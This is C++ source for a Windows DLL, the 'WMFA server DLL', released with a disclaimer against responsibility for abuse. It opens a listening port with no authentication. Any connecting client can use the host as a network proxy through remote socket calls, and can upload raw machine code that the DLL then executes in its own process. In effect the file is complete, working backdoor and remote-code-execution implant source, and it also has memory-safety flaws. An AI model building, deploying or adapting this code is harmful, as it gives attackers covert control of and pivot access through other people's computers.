/************************************************************************************/
/*                                                                                   */
/*  WMFAINS.cpp - WMFA DLL Module                                                    */
/*  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                                    */
/*                                                                                   */
/* IMPORTANT NOTICE:                                                                 */
/* ~~~~~~~~~~~~~~~~~                                                                 */
/* Im NOT responsible for any damages or other abuse or illegal actions done         */
/* by/with this program. It is provided AS IS and it is your risk to use it.         */
/* You may freely distribute this program or parts of it as long as you don't        */
/* modify the "IMPORTANT NOTICE" section of this file.                               */
/*                                                                                   */
/*  This program id WMFA's Server DLL.                                               */
/*                                                                                   */
/*  Compile as follows with Borland(tm) compiler:		                     */
/*  bcc32 -c WMFAINS.cpp                                                             */
/*  ilink32 /c /aa /Tpd c0d32.obj WMFAINS.obj, WMFAINS.dll,, import32.lib cw32mt.lib */
/*                                                                                   */
/*************************************************************************************/

#include <windows.h>
#include <winsock2.h>

#define DMAX_CODE_LENGTH 5000


const USHORT MAX_CLIENTS = 10;
const USHORT MAX_SOCKETS = 10;
const ULONG MAX_CODES = 20;
const USHORT MAX_CODE_LENGTH = 5000;

const BYTE RMT_QUIT = 0x01;

const BYTE RMT_ACCEPT = 0x03;
const BYTE RMT_BIND = 0x04;
const BYTE RMT_CLOSESOCKET = 0x07;
const BYTE RMT_CONNECT = 0x05;
const BYTE RMT_GETPEERNAME = 0x08;
const BYTE RMT_GETSOCKNAME = 0x09;
const BYTE RMT_GETSOCKOPT = 0x0A;
const BYTE RMT_IOCTLSOCKET = 0x0B;
const BYTE RMT_LISTEN = 0x06;
const BYTE RMT_RECV = 0x0C;
const BYTE RMT_RECVFROM = 0x0D;
const BYTE RMT_SELECT = 0x0E;
const BYTE RMT_SEND = 0x0F;
const BYTE RMT_SENDTO = 0x10;
const BYTE RMT_SETSOCKOPT = 0x11;
const BYTE RMT_SHUTDOWN = 0x12;
const BYTE RMT_SOCKET = 0x13;

const BYTE RMT_CODE_RESV = 0x30;
const BYTE RMT_CODE_FREE = 0x31;
const BYTE RMT_CODE_READ = 0x32;
const BYTE RMT_CODE_WRITE = 0x33;
const BYTE RMT_CODE_GET_ADDRESS = 0x38;
const BYTE RMT_CODE_EXEC = 0x34;
const BYTE RMT_CODE_FIX_READ = 0x35;
const BYTE RMT_CODE_FIX_WRITE = 0x36;
const BYTE RMT_CODE_FIX_GET_ADDRESS = 0x39;
const BYTE RMT_CODE_FIX_EXEC = 0x37;

const BYTE RMT_REGISTERCLIENT = 0x20;
const BYTE RMT_UNREGISTERCLIENT = 0x21;


HANDLE hStartThread = INVALID_HANDLE_VALUE;
bool DLLstarted = false;



int startWinsock();

__declspec(dllexport) __stdcall void DoStart(DWORD Port);
__declspec(dllexport) __stdcall void DoQuit();
DWORD WINAPI ListenThread(LPVOID SOCKET);
DWORD WINAPI StartThread(LPVOID junk);

void InitServ();
void CloseServ();

DWORD WINAPI ListenThread(LPVOID Socket);
DWORD WINAPI ClientThread(LPVOID Socket);
bool ExecCommand(USHORT ClientOffs, BYTE cmd);

HANDLE hListenThread;
DWORD ListenThreadId;

USHORT OpenPort = 0;

BYTE TheCode[DMAX_CODE_LENGTH];

// --------------------------------------------------------------------------

struct ClientData
{
    public:

    SOCKET TheSocket;
    HANDLE ThreadHandle;
    in_addr IP;
    bool busy;
    bool registered;
    SOCKET* PerSocket;
    USHORT PerSockets;
    BYTE** PerCode;
    ULONG* PerCodeLength;
    ULONG PerCodes;
};

struct CmdInfo
{
    unsigned short int ClientOffs;
    unsigned char Command;
};

USHORT Clients = 0;
ClientData** TheClientData = 0;
SOCKET acceptSocket;
bool CanDisc = false;
USHORT DoDisc = 0;
bool wait = false;
bool Serverstarted = false;
bool noreact = false;

timeval tval;

DWORD TheRecv(DWORD TheHandle, void* Buffer, DWORD Length);
DWORD TheSend(DWORD TheHandle, void* Buffer, DWORD Length);

// --------------------------------------------------------------------------

int startWinsock()
{
    WSADATA wsad;
    return WSAStartup(MAKEWORD(2, 0), &wsad);
}

DWORD TheRecv(DWORD TheHandle, void* Buffer, DWORD Length)
{
    return ((DWORD) recv((SOCKET) TheHandle, (char*) Buffer, Length, 0));
}

DWORD TheSend(DWORD TheHandle, void* Buffer, DWORD Length)
{
    return ((DWORD) send((SOCKET) TheHandle, (char*) Buffer, Length, 0));
}

// --------------------------------------------------------------------------

void InitServ()
{
    if (Serverstarted) return;
    Serverstarted = true;
    TheClientData = new ClientData* [MAX_CLIENTS];
    for (int i = 0; i < MAX_CLIENTS; i++)
    {
        TheClientData[i] = 0;
    }
    Clients = 0;
    for (int i = 0; i < MAX_CODE_LENGTH; i++)
        TheCode[i] = 0;
}

void CloseServ()
{
    if (!Serverstarted) return;
    Serverstarted = false;
    USHORT temp = 0;
    for (USHORT i = 0; i < MAX_CLIENTS; i++)
    {
        if (TheClientData[i])
        {
            closesocket(TheClientData[i]->TheSocket);
            for (USHORT j = 0; j < MAX_SOCKETS; j++)
            {
                 if (temp >= TheClientData[i]->PerSockets)
                     break;
                 if (TheClientData[i]->PerSocket[j] != INVALID_SOCKET)
                 {
                    closesocket(TheClientData[i]->PerSocket[j]);
                    temp++;
                 }
            }
            delete[] TheClientData[i]->PerSocket;
            delete TheClientData[i];
        }
    }
    delete[] TheClientData;
    Clients = 0;
}

bool AddClient(SOCKET theSocket, HANDLE hThread, in_addr TheIP)
{
    if (Clients >= MAX_CLIENTS) return false;
    ClientData* temp = 0;
    for (int i = 0; i < MAX_CLIENTS; i++)
    {
        if (TheClientData[i] == 0)
        {
            TheClientData[i] = new ClientData;
            temp = TheClientData[i];
            break;
        }
    }
    temp->busy = false;
    temp->IP = TheIP;
    temp->PerSocket = new SOCKET[MAX_SOCKETS];
    for (int i = 0; i < MAX_SOCKETS; i++)
    {
        temp->PerSocket[i] = INVALID_SOCKET;
    }
    temp->PerSockets = 0;
    temp->PerCode = new BYTE*[MAX_CODES];
    temp->PerCodeLength = new ULONG[MAX_CODES];
    for (ULONG i = 0; i < MAX_CODES; i++)
    {
        temp->PerCode[i] = 0;
        temp->PerCodeLength[i] = 0;
    }
    temp->PerCodes = 0;
    temp->registered = false;
    temp->TheSocket = theSocket;
    temp->ThreadHandle = hThread;
    Clients++;
    return true;
}

USHORT IsInList(SOCKET theSocket)
{
    if (Clients == 0) return MAX_CLIENTS;
    USHORT offs = 0;
    bool found = false;
    for (USHORT i = 0; i < MAX_CLIENTS; i++)
    {
        if (TheClientData[i])
        {
            if (TheClientData[i]->TheSocket == theSocket)
            {
                offs = i;
                found = true;
                break;
            }
        }
    }
    if (!found) return MAX_CLIENTS;
    return offs;
}

bool DelClient(SOCKET theSocket)
{
    USHORT offs = IsInList(theSocket);
    USHORT temp = 0;
    if (offs >= MAX_CLIENTS) return false;
    closesocket(TheClientData[offs]->TheSocket);
    for (USHORT i = 0; i < MAX_SOCKETS; i++)
    {
        if (temp >= TheClientData[offs]->PerSockets)
            break;
        if (TheClientData[offs]->PerSocket[i] != INVALID_SOCKET)
        {
            closesocket(TheClientData[offs]->PerSocket[i]);
            temp++;
        }
    }
    delete[] TheClientData[offs]->PerSocket;
    ULONG temptwo = 0;
    for (ULONG i = 0; i < MAX_CODES; i++)
    {
        if (temptwo >= TheClientData[offs]->PerCodes)
            break;
        if (TheClientData[offs]->PerCode[i] != 0)
        {
            delete[] TheClientData[offs]->PerCode[i];
            temptwo++;
        }
    }
    delete[] TheClientData[offs]->PerCode;
    delete[] TheClientData[offs]->PerCodeLength;
    delete TheClientData[offs];
    TheClientData[offs] = 0;
    Clients--;
    return true;
}



// --------------------------------------------------------------------------

#pragma argsused
int WINAPI DllEntryPoint(HINSTANCE hinst, unsigned long reason, void* lpReserved)
{
    return 1;
}
//---------------------------------------------------------------------------


void __stdcall DoStart(DWORD Port)
{
    OpenPort = (USHORT) Port;
    tval.tv_sec = 1;
    tval.tv_usec = 1;
    if (DLLstarted)
        return;
    startWinsock();
    DWORD tId;
    InitServ();
    hStartThread = CreateThread(NULL, 0, &StartThread, 0, 0, &tId);
    DLLstarted = true;
}

void __stdcall DoQuit()
{
    if (!DLLstarted)
        return;
    unsigned long int ExitCode;
    GetExitCodeThread(hStartThread, &ExitCode);
    noreact = true;
    WaitForSingleObject(hStartThread, 1000);
    TerminateThread(hStartThread, ExitCode);
    CloseServ();
    WSACleanup();
    DLLstarted = false;
}

DWORD WINAPI StartThread(LPVOID Socket)
{
    acceptSocket=socket(AF_INET,SOCK_STREAM,0);
    sockaddr_in addr;
    memset(&addr,0,sizeof(SOCKADDR_IN));
    addr.sin_family=AF_INET;
    addr.sin_port=htons(OpenPort);
    addr.sin_addr.s_addr=ADDR_ANY;
    bind(acceptSocket,(SOCKADDR*)&addr,sizeof(SOCKADDR_IN));
    listen(acceptSocket, MAX_CLIENTS);
    tval.tv_sec = 0;
    tval.tv_usec = 0;
    hListenThread = CreateThread(NULL, 0, &ListenThread, (void*) &acceptSocket,
      0, &ListenThreadId);
    SetThreadPriority(hListenThread, THREAD_PRIORITY_ABOVE_NORMAL);
    WaitForSingleObject(hListenThread, INFINITE);
    return 0;
}

    

DWORD WINAPI ListenThread(LPVOID Socket)
{
    SOCKET acSocket = *((SOCKET*) Socket);
    SOCKET NewClient = INVALID_SOCKET;
    HANDLE hClientThread = INVALID_HANDLE_VALUE;
    DWORD ClientThreadId = 0;
    struct sockaddr_in saddr;
    in_addr x;
    int temp = sizeof(sockaddr);
    FD_SET xset;
    FD_ZERO(&xset);
    FD_SET(acSocket, &xset);
    timeval xval;
    xval.tv_sec = 1;
    xval.tv_usec = 1;
    for(;;)
    {
        while (wait)
        {
        }
        if (noreact) break;
        CanDisc = true;
        for(;;)
        {
            select(0, &xset, 0, 0, &xval);
            if (!FD_ISSET(acSocket, &xset))
            {
                FD_SET(acSocket, &xset);
            }
            else break;
        }
        NewClient = accept(acSocket, NULL, NULL);
        while (wait)
        {
        }
        wait = true;
        if (noreact) break;
        CanDisc = false;
        while (DoDisc > 0)
        {
        }
        if (Clients == MAX_CLIENTS)
        {
            closesocket(NewClient);
        }
        else
        {
            memset(&saddr, 0, sizeof(sockaddr));
            getpeername(NewClient, (struct sockaddr*) &saddr, &temp);
            hClientThread = CreateThread(NULL, 0, &ClientThread,
              (void*) &NewClient, 0, &ClientThreadId);
            SetThreadPriority(hClientThread, THREAD_PRIORITY_NORMAL);
            AddClient(NewClient, hClientThread, saddr.sin_addr);
        }
        wait = false;
    }
    return 0;
}

DWORD WINAPI ClientThread(LPVOID Socket)
{
    while (wait)
    {
    }
    SOCKET mySocket = *((SOCKET*) Socket);
    BYTE cmd;
    long rc;
    fd_set fset;
    int offs = IsInList(mySocket);
    for (;;)
    {
        while (wait)
        {
        }
        FD_SET(mySocket, &fset);
        select(0, &fset, 0, 0, &tval);
        if (FD_ISSET(mySocket, &fset))
        {
            while (wait)
            {
            }
            if (noreact)
            {
                 return 0;
            }
            rc = recv(mySocket, (char*) &cmd,
              1, 0);
            if (noreact) return 0;
            if (rc != 0 && rc != SOCKET_ERROR)
            {
                if (ExecCommand(offs, cmd))
                    break;
            }
            else
                break;
        }
        else
            FD_SET(mySocket, &fset);
    }
    while (!CanDisc)
    {
        if (noreact) return 0;
    }
    while (DoDisc > 0)
    {
    }
    if (noreact) return 0;
    DoDisc++;
    while (wait)
    {
    }
    wait = true;
    DelClient(mySocket);
    wait = false;
    DoDisc--;
    return 0;
}

bool ExecCommand(USHORT ClientOffs, BYTE cmd)
{
    timeval tmptimeval;
    fd_set fdOne;
    fd_set fdTwo;
    fd_set fdThree;
    DWORD tmpReadSock;
    DWORD tmpWriteSock;
    DWORD tmpExceptSock;
    DWORD tmpDword;
    DWORD tmpOne;
    USHORT tmpTwo;
    DWORD Param1;
    DWORD Param2;
    DWORD Param3;
    DWORD Param4;
    DWORD Param5;
    DWORD Param6;
    DWORD Ret;
    BYTE* tmpbuffer = 0;
    sockaddr satmp;
    sockaddr satmp2;
    switch(cmd)
    {
        case RMT_QUIT:
        {
            return true;
        }
        case RMT_REGISTERCLIENT:
        {
            TheClientData[ClientOffs]->registered = true;
        }
        break;
        case RMT_UNREGISTERCLIENT:
        {
            TheClientData[ClientOffs]->registered = false;
        }
        break;
        case RMT_SOCKET:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            if (TheClientData[ClientOffs]->PerSockets == MAX_SOCKETS)
            {
                Ret = -1;
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
                break;
            }
            for (int i = 0; i < MAX_SOCKETS; i++)
            {
                if (TheClientData[ClientOffs]->PerSocket[i] ==
                  INVALID_SOCKET)
                {
                    tmpTwo = i;
                    break;
                }
            }
            TheClientData[ClientOffs]->PerSocket[tmpTwo] = socket(Param1,
              Param2, Param3);
            Ret = tmpTwo;
            TheClientData[ClientOffs]->PerSockets++;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CLOSESOCKET:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            Ret = closesocket(TheClientData[ClientOffs]->PerSocket[Param1]);
            TheClientData[ClientOffs]->PerSocket[Param1] = INVALID_SOCKET;
            TheClientData[ClientOffs]->PerSockets--;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CONNECT:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            Ret = connect(TheClientData[ClientOffs]->PerSocket[Param1],
              &satmp, Param3);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_SEND:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            tmpbuffer = new BYTE[Param2];
            TheRecv(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Param2);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            Ret = send(TheClientData[ClientOffs]->PerSocket[Param1],
              tmpbuffer, Param2, Param3);
            delete[] tmpbuffer;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_RECV:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param4, 4);
            tmpbuffer = new BYTE[Param3];
            Ret = recv(TheClientData[ClientOffs]->PerSocket[Param1],
              tmpbuffer, Param3, Param4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Ret);
            delete[] tmpbuffer;
        }
        break;
        case RMT_ACCEPT:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            if (TheClientData[ClientOffs]->PerSockets == MAX_SOCKETS)
            {
                Ret = 0;
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
                break;
            }
            for (int i = 0; i < MAX_SOCKETS; i++)
            {
                if (TheClientData[ClientOffs]->PerSocket[i] ==
                  INVALID_SOCKET)
                {
                    tmpTwo = i;
                    break;
                }
            }
            TheClientData[ClientOffs]->PerSocket[tmpTwo] =
              accept(TheClientData[ClientOffs]->PerSocket[Param1],
              &satmp, (int*) &tmpDword);
            Ret = tmpTwo;
            TheClientData[ClientOffs]->PerSockets++;
            TheSend(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_BIND:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            Ret = bind(TheClientData[ClientOffs]->PerSocket[Param1],
              &satmp, Param3);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_LISTEN:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            Ret = listen(TheClientData[ClientOffs]->PerSocket[Param1],
              Param2);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_SENDTO:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            tmpbuffer = new BYTE[Param3];
            TheRecv(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Param3);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param4, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp2,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param6, 4);
            Ret = sendto(TheClientData[ClientOffs]->PerSocket[Param1],
              tmpbuffer, Param3, Param4, &satmp2, Param6);
            delete[] tmpbuffer;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_RECVFROM:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param4, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp2,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            tmpbuffer = new BYTE[Param3];
            Ret = recvfrom(TheClientData[ClientOffs]->PerSocket[Param1],
              tmpbuffer, Param3, Param4, &satmp2, (int*) &tmpDword);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Ret);
            TheSend(TheClientData[ClientOffs]->TheSocket, &satmp2,
              sizeof(sockaddr));
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            delete[] tmpbuffer;
        }
        break;
        case RMT_SELECT:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpReadSock, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpWriteSock, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpExceptSock, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmptimeval,
              sizeof(timeval));
            FD_ZERO(&fdOne);
            FD_ZERO(&fdTwo);
            FD_ZERO(&fdThree);
            if (tmpReadSock != INVALID_SOCKET)
                FD_SET(TheClientData[ClientOffs]->PerSocket[tmpReadSock], &fdOne);
            if (tmpWriteSock != INVALID_SOCKET)
                FD_SET(TheClientData[ClientOffs]->PerSocket[tmpWriteSock], &fdTwo);
            if (tmpExceptSock != INVALID_SOCKET)
                FD_SET(TheClientData[ClientOffs]->PerSocket[tmpExceptSock],
              &fdThree);
            Ret = select(Param1, &fdOne, &fdTwo, &fdThree,
              &tmptimeval);
            if (!FD_ISSET(TheClientData[ClientOffs]->PerSocket[tmpReadSock],
              &fdOne))
                 tmpReadSock = INVALID_SOCKET;
            if (!FD_ISSET(TheClientData[ClientOffs]->PerSocket[tmpWriteSock],
              &fdTwo))
                 tmpWriteSock = INVALID_SOCKET;
            if (!FD_ISSET(TheClientData[ClientOffs]->PerSocket[tmpExceptSock],
              &fdThree))
                 tmpExceptSock = INVALID_SOCKET;
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpReadSock, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpWriteSock, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpExceptSock, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_GETPEERNAME:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            Ret = getpeername(TheClientData[ClientOffs]->PerSocket[Param1],
              &satmp, (int*) &tmpDword);
            TheSend(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_GETSOCKNAME:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            Ret = getsockname(TheClientData[ClientOffs]->PerSocket[Param1],
              &satmp, (int*) &tmpDword);
            TheSend(TheClientData[ClientOffs]->TheSocket, &satmp,
              sizeof(sockaddr));
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_IOCTLSOCKET:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            Ret = ioctlsocket(TheClientData[ClientOffs]->PerSocket[Param1],
              Param2, (unsigned long*) &tmpDword);
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_SHUTDOWN:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            Ret = shutdown(TheClientData[ClientOffs]->PerSocket[Param1],
              Param2);
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_GETSOCKOPT:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            tmpbuffer = new BYTE[tmpDword];
            Ret = getsockopt(TheClientData[ClientOffs]->PerSocket[Param1],
              Param2, Param3, tmpbuffer, (int*) &tmpDword);
            TheSend(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            TheSend(TheClientData[ClientOffs]->TheSocket, tmpbuffer, tmpDword);
            delete[] tmpbuffer;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);

        }
        break;
        case RMT_SETSOCKOPT:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param3, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &tmpDword, 4);
            tmpbuffer = new BYTE[tmpDword];
            TheRecv(TheClientData[ClientOffs]->TheSocket, tmpbuffer, tmpDword);
            Ret = setsockopt(TheClientData[ClientOffs]->PerSocket[Param1],
              Param2, Param3, tmpbuffer, tmpDword);
            delete[] tmpbuffer;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);

        }
        break;
        case RMT_CODE_RESV:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            if (TheClientData[ClientOffs]->PerCodes == MAX_CODES)
            {
                Ret = -1;
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
                break;
            }
            if (Param1 > MAX_CODE_LENGTH)
            {
                Ret = -1;
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
                break;
            }
            for (int i = 0; i < MAX_CODES; i++)
            {
                if (TheClientData[ClientOffs]->PerCode[i] == 0)
                {
                    tmpOne = i;
                    break;
                }
            }
            TheClientData[ClientOffs]->PerCodeLength[tmpOne] = Param1;
            TheClientData[ClientOffs]->PerCode[tmpOne] = new BYTE[Param1];
            Ret = tmpOne;
            TheClientData[ClientOffs]->PerCodes++;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CODE_FREE:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            if (Param1 >= MAX_CODES)
                Ret = -1;
            else if (TheClientData[ClientOffs]->PerCode[Param1] == 0)
                Ret = -1;
            else
            {
                delete[] TheClientData[ClientOffs]->PerCode[Param1];
                TheClientData[ClientOffs]->PerCode[Param1] = 0;
                TheClientData[ClientOffs]->PerCodes--;
            }
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CODE_READ:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            if (Param1 >= MAX_CODES)
                Ret = -1;
            else if (TheClientData[ClientOffs]->PerCode[Param1] == 0)
                Ret = -1;
            else if (TheClientData[ClientOffs]->PerCodeLength[Param1] < Param2)
                Ret = -1;
            if (Ret != (ULONG) -1)
            {
                tmpbuffer = new BYTE[Param2];
                memcpy(tmpbuffer, TheClientData[ClientOffs]->PerCode[Param1],
                  Param2);
                Ret = Param2;
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
                TheSend(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Ret);
            }
            else
            {
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
            }
            delete[] tmpbuffer;
        }
        break;
        case RMT_CODE_WRITE:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            tmpbuffer = new BYTE[Param2];
            TheRecv(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Param2);
            if (Param1 >= MAX_CODES)
                Ret = -1;
            else if (TheClientData[ClientOffs]->PerCode[Param1] == 0)
                Ret = -1;
            else if (TheClientData[ClientOffs]->PerCodeLength[Param1] < Param2)
                Ret = -1;
            if (Ret != (ULONG) -1)
            {
                memcpy(TheClientData[ClientOffs]->PerCode[Param1], tmpbuffer,
                  Param2);
                Ret = Param2;
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
            }
            else
            {
                TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
            }
            delete[] tmpbuffer;
        }
        break;
        case RMT_CODE_GET_ADDRESS:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            if (Param1 >= MAX_CODES)
                Ret = -1;
            else
            {
                Ret = (ULONG) TheClientData[ClientOffs]->PerCode[Param1];
            }
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CODE_EXEC:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            if (Param1 >= MAX_CODES)
                Ret = -1;
            else if (TheClientData[ClientOffs]->PerCode[Param1] == 0)
                Ret = -1;
            if (Ret != (ULONG) -1)
            {
                Ret = ((ULONG (*)(ULONG)) (TheClientData[ClientOffs]->
                  PerCode[Param1]))(Param2);
            }
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CODE_FIX_GET_ADDRESS:
        {
            Ret = (ULONG) &TheCode;
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
        }
        break;
        case RMT_CODE_FIX_EXEC:
        {
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param1, 4);
            tmpbuffer = new BYTE[Param1];
            TheRecv(TheClientData[ClientOffs]->TheSocket, tmpbuffer, Param1);
            TheRecv(TheClientData[ClientOffs]->TheSocket, &Param2, 4);
            if (Param1 <= MAX_CODE_LENGTH)
            {
                memcpy((char*) (&TheCode), tmpbuffer, Param1);
                tmpOne = (ULONG) &TheCode;
                Ret = ((ULONG (*)(ULONG)) tmpOne)(Param2);
            }
            else
            {
                Ret = -1;
            }
            TheSend(TheClientData[ClientOffs]->TheSocket, &Ret, 4);
            delete[] tmpbuffer;
        }
        break;
    }
    return false;
}
